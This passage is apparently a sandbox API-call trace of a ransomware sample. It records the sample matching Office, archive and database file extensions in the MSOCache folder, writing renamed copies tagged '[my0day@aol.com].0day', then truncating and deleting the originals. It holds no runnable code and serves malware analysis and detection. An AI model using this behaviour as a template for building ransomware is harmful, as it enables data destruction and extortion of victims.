(lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.991] lstrlenW (lpString=".jpg") returned 4 [0035.992] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.992] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.992] lstrlenW (lpString="Office32WW.xml") returned 14 [0035.992] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.993] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=4274) returned 1 [0035.993] CloseHandle (hObject=0x1a0) returned 1 [0035.993] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0035.993] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.993] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.993] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.993] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.993] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0035.993] GetLastError () returned 0x0 [0035.993] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0035.995] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0035.996] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.996] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.996] SetEndOfFile (hFile=0x16c) returned 1 [0035.996] CloseHandle (hObject=0x16c) returned 1 [0035.997] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.997] SetEndOfFile (hFile=0x1a0) returned 1 [0035.998] CloseHandle (hObject=0x1a0) returned 1 [0035.998] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.998] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0035.998] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.998] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.998] lstrlenW (lpString=".doc") returned 4 [0035.998] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.998] lstrlenW (lpString=".docx") returned 5 [0035.998] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.998] lstrlenW (lpString=".pdf") returned 4 [0035.998] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.998] lstrlenW (lpString=".xls") returned 4 [0035.998] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.998] lstrlenW (lpString=".xlsx") returned 5 [0035.998] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.998] lstrlenW (lpString=".ppt") returned 4 [0035.998] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.998] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.998] lstrlenW (lpString=".zip") returned 4 [0035.998] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.998] lstrlenW (lpString=".rar") returned 4 [0035.998] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.999] lstrlenW (lpString=".bz2") returned 4 [0035.999] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.999] lstrlenW (lpString=".7z") returned 3 [0035.999] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.999] lstrlenW (lpString=".dbf") returned 4 [0035.999] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.999] lstrlenW (lpString=".1cd") returned 4 [0035.999] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.999] lstrlenW (lpString=".jpg") returned 4 [0035.999] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.999] lstrlenW (lpString=".doc") returned 4 [0035.999] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.999] lstrlenW (lpString=".docx") returned 5 [0035.999] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.999] lstrlenW (lpString=".pdf") returned 4 [0035.999] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.999] lstrlenW (lpString=".xls") returned 4 [0035.999] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.999] lstrlenW (lpString=".xlsx") returned 5 [0035.999] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.999] lstrlenW (lpString=".ppt") returned 4 [0035.999] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.999] lstrlenW (lpString=".zip") returned 4 [0035.999] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.999] lstrlenW (lpString=".rar") returned 4 [0035.999] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.000] lstrlenW (lpString=".bz2") returned 4 [0036.000] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.000] lstrlenW (lpString=".7z") returned 3 [0036.000] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.000] lstrlenW (lpString=".dbf") returned 4 [0036.000] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.000] lstrlenW (lpString=".1cd") returned 4 [0036.000] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.000] lstrlenW (lpString=".jpg") returned 4 [0036.000] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.000] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0036.000] lstrlenW (lpString="Setup.xml") returned 9 [0036.000] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0036.000] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=20577) returned 1 [0036.000] CloseHandle (hObject=0x1a0) returned 1 [0036.000] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0036.001] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.001] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0036.001] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.001] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.001] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0036.001] GetLastError () returned 0x0 [0036.001] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x5061, lpOverlapped=0x0) returned 1 [0036.003] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x5070, lpOverlapped=0x0) returned 1 [0036.004] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.004] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.005] SetEndOfFile (hFile=0x16c) returned 1 [0036.005] CloseHandle (hObject=0x16c) returned 1 [0036.005] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.005] SetEndOfFile (hFile=0x1a0) returned 1 [0036.006] CloseHandle (hObject=0x1a0) returned 1 [0036.006] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0036.006] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.007] lstrlenW (lpString=".doc") returned 4 [0036.007] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.007] lstrlenW (lpString=".docx") returned 5 [0036.007] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.007] lstrlenW (lpString=".pdf") returned 4 [0036.007] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.007] lstrlenW (lpString=".xls") returned 4 [0036.007] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.007] lstrlenW (lpString=".xlsx") returned 5 [0036.007] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.007] lstrlenW (lpString=".ppt") returned 4 [0036.007] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.007] lstrlenW (lpString=".zip") returned 4 [0036.007] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.007] lstrlenW (lpString=".rar") returned 4 [0036.007] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.007] lstrlenW (lpString=".bz2") returned 4 [0036.007] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.007] lstrlenW (lpString=".7z") returned 3 [0036.007] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.007] lstrlenW (lpString=".dbf") returned 4 [0036.007] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.007] lstrlenW (lpString=".1cd") returned 4 [0036.008] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.008] lstrlenW (lpString=".jpg") returned 4 [0036.008] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.008] lstrlenW (lpString=".doc") returned 4 [0036.008] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.008] lstrlenW (lpString=".docx") returned 5 [0036.008] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.008] lstrlenW (lpString=".pdf") returned 4 [0036.008] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.008] lstrlenW (lpString=".xls") returned 4 [0036.008] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.008] lstrlenW (lpString=".xlsx") returned 5 [0036.008] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.008] lstrlenW (lpString=".ppt") returned 4 [0036.008] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.008] lstrlenW (lpString=".zip") returned 4 [0036.008] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.008] lstrlenW (lpString=".rar") returned 4 [0036.008] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.008] lstrlenW (lpString=".bz2") returned 4 [0036.008] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.008] lstrlenW (lpString=".7z") returned 3 [0036.008] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.008] lstrlenW (lpString=".dbf") returned 4 [0036.008] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.008] lstrlenW (lpString=".1cd") returned 4 [0036.008] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.009] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.009] lstrlenW (lpString=".jpg") returned 4 [0036.009] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.009] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0036.009] lstrlenW (lpString="VisiorWW.xml") returned 12 [0036.009] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0036.010] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=8723) returned 1 [0036.010] CloseHandle (hObject=0x1a0) returned 1 [0036.010] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 0x2020 [0036.010] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.010] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0036.010] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.010] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.010] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0036.010] GetLastError () returned 0x0 [0036.010] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x2213, lpOverlapped=0x0) returned 1 [0036.012] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x2220, lpOverlapped=0x0) returned 1 [0036.013] ReadFile (in: hFile=0x1a0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.013] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0036.013] SetEndOfFile (hFile=0x16c) returned 1 [0036.013] CloseHandle (hObject=0x16c) returned 1 [0036.014] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.014] SetEndOfFile (hFile=0x1a0) returned 1 [0036.014] CloseHandle (hObject=0x1a0) returned 1 [0036.015] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0036.015] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 1 [0036.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.015] lstrlenW (lpString=".doc") returned 4 [0036.015] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.015] lstrlenW (lpString=".docx") returned 5 [0036.015] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.015] lstrlenW (lpString=".pdf") returned 4 [0036.015] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.015] lstrlenW (lpString=".xls") returned 4 [0036.015] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.015] lstrlenW (lpString=".xlsx") returned 5 [0036.015] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.015] lstrlenW (lpString=".ppt") returned 4 [0036.015] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.015] lstrlenW (lpString=".zip") returned 4 [0036.015] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.015] lstrlenW (lpString=".rar") returned 4 [0036.015] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString=".bz2") returned 4 [0036.016] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString=".7z") returned 3 [0036.016] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.016] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.016] lstrlenW (lpString=".dbf") returned 4 [0036.016] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.016] lstrlenW (lpString=".1cd") returned 4 [0036.016] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.016] lstrlenW (lpString=".jpg") returned 4 [0036.016] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.016] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.016] lstrlenW (lpString=".doc") returned 4 [0036.016] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString=".docx") returned 5 [0036.016] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.016] lstrlenW (lpString=".pdf") returned 4 [0036.016] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString=".xls") returned 4 [0036.016] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString=".xlsx") returned 5 [0036.016] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.016] lstrlenW (lpString=".ppt") returned 4 [0036.016] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.016] lstrlenW (lpString=".zip") returned 4 [0036.016] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.016] lstrlenW (lpString=".rar") returned 4 [0036.016] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.016] lstrlenW (lpString=".bz2") returned 4 [0036.016] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.017] lstrlenW (lpString=".7z") returned 3 [0036.017] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.017] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.017] lstrlenW (lpString=".dbf") returned 4 [0036.017] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.017] lstrlenW 